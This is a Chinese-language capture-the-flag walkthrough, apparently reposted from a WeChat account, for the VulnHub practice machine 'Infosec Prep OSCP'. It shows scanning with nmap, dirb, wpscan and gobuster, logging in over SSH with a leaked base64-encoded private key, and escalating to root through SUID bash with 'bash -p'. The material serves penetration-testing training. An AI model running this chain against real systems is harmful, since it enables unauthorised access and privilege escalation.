OSCP难度靶机之Infosec Prep OSCP

admin 2022年11月25日10:41:52评论82 views字数 832阅读2分46秒阅读模式
虚拟机下载地址:https://www.vulnhub.com/entry/infosec-prep-oscp,508/
虚拟机简介:这台机器是为InfoSec Prep Discord 服务器创建的
目标:1个flag
级别:中级

1、信息收集

1.1通过arp-scan检测主机IP地址

arp-scan 192.168.207.0/24

OSCP难度靶机之Infosec Prep OSCP

1.2 通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.148

查看开放22、80、33060端口

OSCP难度靶机之Infosec Prep OSCP

2、渗透测试

2.1 WEB渗透

1.站点信息收集

访问站点首页显示OSCP靶机页面

OSCP难度靶机之Infosec Prep OSCP

通过dirb进行目录扫描,发现存在WordPress

dirb http://192.168.207.148

OSCP难度靶机之Infosec Prep OSCP

2.使用wpscan进行扫描

使用wpscan未发现有用信息,仅发现一个admin账号

wpscan --url "http://192.168.207.148/" -eu

OSCP难度靶机之Infosec Prep OSCP

使用gobuster进行爆破发现存在secret.txt

gobuster dir -u http://192.168.207.148 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt

OSCP难度靶机之Infosec Prep OSCP

访问secret.txt中发现文件内容为base64编码

OSCP难度靶机之Infosec Prep OSCP

3.获取SSH密钥

通过base64解码,发现为SSH密钥

OSCP难度靶机之Infosec Prep OSCP

复制解密内容并保存为id_rsa,修改文件权限,并根据站点首页提示仅有一个oscp账号

OSCP难度靶机之Infosec Prep OSCP

chmod 600 id_rsa
ssh -i id_rsa [email protected]

OSCP难度靶机之Infosec Prep OSCP

2.2 主机渗透

1.查看SUID文件

find / -perm -u=s -type f 2>/dev/null

OSCP难度靶机之Infosec Prep OSCP

2.通过bash提权

通过bash提权已经获取到root权限

bash -p
id

OSCP难度靶机之Infosec Prep OSCP

查看FLAG

cat /root/flag.txt

OSCP难度靶机之Infosec Prep OSCP

原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Infosec Prep OSCP

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月25日10:41:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP难度靶机之Infosec Prep OSCPhttp://cn-sec.com/archives/1422666.html

发表评论

匿名网友 填写信息